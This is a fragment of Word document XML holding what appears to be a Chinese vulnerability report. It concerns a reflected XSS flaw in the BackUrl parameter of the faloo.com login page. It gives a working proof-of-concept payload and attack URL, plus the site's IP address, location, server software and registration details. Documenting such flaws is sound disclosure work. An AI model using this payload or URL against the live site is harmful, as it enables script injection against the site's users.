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u.faloo.com/Regist/Login.aspx?t=2&amp;BackUrl=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞参数:BackUrl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>请求方式:GET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>攻击载荷:&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script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5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站主页  http://u.faloo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飞卢网--用户登录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>IP__坐标  河北省廊坊市 联通</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>所属__IP  221.192.139.242</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站年龄  14年7月30天（创建于2004年10月28日,过期时间为2027年10月28日)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案编号  京ICP备18030338号-3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北京创阅科技有限公司</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案时间  2018/10/8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gb2312  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">服务类型   Microsoft-IIS/8.5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u.faloo.com/Regist/Login.aspx?t=2&amp;BackUrl=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;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.faloo.c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